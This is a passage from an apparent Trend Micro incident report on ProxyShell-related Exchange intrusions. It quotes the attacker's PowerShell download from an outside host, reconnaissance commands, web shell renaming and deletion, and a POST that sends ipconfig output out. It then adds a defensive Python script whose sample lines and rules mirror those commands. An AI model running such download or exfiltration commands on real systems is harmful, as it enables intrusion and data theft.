Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR

Trend Micro -

Both servers are using Liferay CE version 6.2, which is vulnerable to CVE-2020-7961 (possibly leading to remote code execution).

Incident # 2

Similar to the first incident, the malicious actor accesses the server via a web shell and then starts to gather basic information on the system. However, the second incident used PowerShell for different post-exploitation activities.

Our analysis shows that a Wget request was sent to a URL on a high-numbered port. Unfortunately, we don't have information as to what was downloaded, since the URL was already dead by the time of analysis.

"C:\Windows\System32\cmd.exe" /c powershell wget http://209.14.0[.]234:56138/iMCRufG79yXvYjH0W1SK

The following commands were executed in order to gather basic system information:

cmd.exe /c ipconfig
cmd.exe /c dir
"c:\windows\system32\cmd.exe" /c ping -n 1
"c:\windows\system32\cmd.exe" /c whoami

The web shell was then copied and the original entry deleted using the following commands:

cmd.exe /c ren C:\inetpub\wwwroot\aspnet_client\errorFF.aspx.req errorFF.aspx
"c:\windows\system32\cmd.exe" /c del "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorFF.aspx.req"

The output of the ipconfig command was then sent out as the body of a wget (Invoke-WebRequest) POST request.

The following code shows the PowerShell-encoded (top) and decoded (bottom) commands:


$r=ipconfig /all | out-string;wget -Uri -Method Post -Body $r -ContentType "application/octet-stream"
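The three behaviours seen in this incident (a PowerShell download from a non-standard port, rename/delete operations on .aspx files in the Exchange front-end or IIS web root, and a PowerShell POST whose body is the output of a local command) are all visible in process-creation command lines. The script below is an added example, not Trend Micro's detection logic or tooling: it runs three simple rules over a set of constructed command lines modelled on the ones above. The host, port and URL path in the samples are placeholders (TEST-NET addresses), not the incident's indicators, and the directory and extension lists are assumptions a defender would tune for their own environment.

```python
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import urlparse

# Constructed sample process-creation command lines modelled on the incident
# above. Host, port and URL paths are placeholders, not the page's IoCs.
SAMPLE_COMMAND_LINES = [
    '"C:\\Windows\\System32\\cmd.exe" /c powershell wget http://203.0.113.10:56138/placeholder_payload',
    'cmd.exe /c ipconfig',
    'cmd.exe /c whoami',
    'cmd.exe /c ren C:\\inetpub\\wwwroot\\aspnet_client\\errorFF.aspx.req errorFF.aspx',
    '"c:\\windows\\system32\\cmd.exe" /c del "C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\errorFF.aspx.req"',
    'powershell $r=ipconfig /all | out-string;wget -Uri http://203.0.113.10:56138/up -Method Post -Body $r -ContentType "application/octet-stream"',
    'C:\\Windows\\System32\\svchost.exe -k netsvcs',  # benign control line
]

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
# PowerShell cmdlets/aliases that fetch over HTTP (wget and curl are aliases of Invoke-WebRequest)
DOWNLOADERS = ("wget", "iwr", "invoke-webrequest", "curl", "invoke-restmethod", "irm")
FILE_OPS = ("ren", "rename", "del", "erase", "copy", "move", "xcopy")
# Assumed locations where web shells are typically dropped on an Exchange/IIS host
WEB_SHELL_DIRS = ("\\frontend\\httpproxy\\", "\\inetpub\\wwwroot\\")
WEB_SHELL_EXTS = (".aspx", ".ashx", ".asmx", ".asp")
STANDARD_PORTS = {80, 443}


@dataclass
class Finding:
    rule: str
    detail: str


def tokens_of(cmdline: str) -> List[str]:
    """Loose tokenisation: split on whitespace, ';' and '|', drop quotes, lower-case."""
    return [t.strip("\"'").lower() for t in re.split(r"[\s;|]+", cmdline) if t]


def nonstandard_port_download(cmdline: str) -> Optional[Finding]:
    """PowerShell web fetch whose URL points at a port other than 80/443."""
    if "powershell" not in cmdline.lower():
        return None
    if not any(d in tokens_of(cmdline) for d in DOWNLOADERS):
        return None
    for url in URL_RE.findall(cmdline):
        parsed = urlparse(url)
        port = parsed.port or (443 if parsed.scheme.lower() == "https" else 80)
        if port not in STANDARD_PORTS:
            return Finding("powershell_download_nonstandard_port", f"{parsed.hostname}:{port}")
    return None


def web_shell_file_operation(cmdline: str) -> Optional[Finding]:
    """ren/del/copy/move of an ASP.NET file under an Exchange front-end or IIS web root path."""
    tokens = tokens_of(cmdline)
    op = next((o for o in FILE_OPS if o in tokens), None)
    if op is None:
        return None
    lower = cmdline.lower()
    hit_dir = next((d for d in WEB_SHELL_DIRS if d in lower), None)
    hit_ext = next((e for e in WEB_SHELL_EXTS if e in lower), None)
    if hit_dir is None or hit_ext is None:
        return None
    return Finding("web_shell_file_operation", f"{op} of {hit_ext} file under {hit_dir}")


def posts_command_output(cmdline: str) -> Optional[Finding]:
    """PowerShell POST whose -Body is a variable filled from a local command pipeline."""
    if not re.search(r"-Method\s+Post\b", cmdline, re.IGNORECASE):
        return None
    body = re.search(r"-Body\s+\$(\w+)", cmdline, re.IGNORECASE)
    if not body:
        return None
    var = body.group(1)
    assign = re.search(r"\$" + re.escape(var) + r"\s*=\s*([^;]+)", cmdline, re.IGNORECASE)
    source = assign.group(1).strip() if assign else "<unknown>"
    return Finding("powershell_post_of_command_output", f"body ${var} = {source}")


RULES = (nonstandard_port_download, web_shell_file_operation, posts_command_output)


def triage(cmdlines: List[str]):
    """Return (line index, Finding) pairs for every rule that fires on each command line."""
    results = []
    for idx, line in enumerate(cmdlines):
        for rule in RULES:
            finding = rule(line)
            if finding:
                results.append((idx, finding))
    return results


if __name__ == "__main__":
    for idx, finding in triage(SAMPLE_COMMAND_LINES):
        print(f"line {idx}: {finding.rule} ({finding.detail})")
```

The rules are deliberately narrow and string-based so they can be moved into a SIEM query with little change; the file-operation rule fires on both the `ren` of the `.aspx.req` file in the IIS web root and the `del` under the Exchange HttpProxy path, which is the pattern of staging a web shell and then removing the original copy.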

